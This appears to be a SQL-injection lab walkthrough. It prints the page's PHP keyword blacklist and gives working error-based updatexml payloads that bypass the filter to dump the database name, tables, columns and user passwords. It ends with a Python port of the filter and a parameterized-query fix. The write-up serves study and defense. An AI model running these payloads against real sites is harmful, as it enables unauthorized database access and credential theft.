Confirm that this is a single-quote string injection:
?id=1''
When you continue working you find that much of the input is stripped out; looking at the source, a blacklist filters many tokens: or, and, whitespace, and so on:
function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);        // strip out OR (non case sensitive)
    $id = preg_replace('/and/i', "", $id);       // strip out AND (non case sensitive)
    $id = preg_replace('/[\/\*]/', "", $id);     // strip out /*
    $id = preg_replace('/[--]/', "", $id);       // strip out --
    $id = preg_replace('/[#]/', "", $id);        // strip out #
    $id = preg_replace('/[\s]/', "", $id);       // strip out spaces
    $id = preg_replace('/[\/\\\\]/', "", $id);   // strip out slashes
    return $id;
}
So a bypass is needed here: use || in place of or, && in place of and, and () in place of spaces.
Dump the database name:
-1'||updatexml(1,concat(0x7e,database()),0)||'1'='1
Dump the tables:
?id=-1' || updatexml(1, concat(0x7e, (select (group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=0x7365637572697479))) ,1)||'1'='1
Dump the columns:
?id=-1' || updatexml(1, concat(0x7e, (select (group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users'))) ,1)||'1'='1
Dump the data:
?id=-1' || updatexml(1, concat(0x7e, (select (group_concat(username,passwoorrd))from(users))) ,1)||'1'='1
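As an added example (not the lab's own code), the PHP blacklist() above ported to Python, next to the bound-parameter lookup that should replace it; the users table is constructed sample data. It shows why the double-written infoorrmation_schema and passwoorrd in the payloads come out intact: the filter is a single-pass delete and is not idempotent.

```python
import re
import sqlite3

# Python port of the PHP blacklist(): one re.sub per preg_replace, same order,
# same case-insensitivity. Added example, not the lab's code.
BLACKLIST_STEPS = [
    re.compile(r"or", re.I),     # /or/i
    re.compile(r"and", re.I),    # /and/i
    re.compile(r"[/*]"),         # /[\/\*]/
    re.compile(r"[--]"),         # /[--]/  (a character class: removes every '-')
    re.compile(r"[#]"),          # /[#]/
    re.compile(r"\s"),           # /[\s]/
    re.compile(r"[/\\]"),        # /[\/\\\\]/
]

def blacklist(value: str) -> str:
    for pattern in BLACKLIST_STEPS:
        value = pattern.sub("", value)
    return value

def is_fixed_point(value: str) -> bool:
    """A sanitizer is only trustworthy if filtering twice changes nothing.
    Single-pass deletion is not: removing 'or' from 'infoorrmation' yields
    'information', which again contains 'or'."""
    once = blacklist(value)
    return blacklist(once) == once

def demo_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the lab's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return conn

def lookup_username(conn: sqlite3.Connection, user_id: str):
    """Hardened replacement for filter-then-interpolate: validate the type,
    then bind the value so the database never parses it as SQL."""
    if not re.fullmatch(r"\d{1,9}", user_id):
        return None
    row = conn.execute("SELECT username FROM users WHERE id = ?", (int(user_id),)).fetchone()
    return row[0] if row else None
```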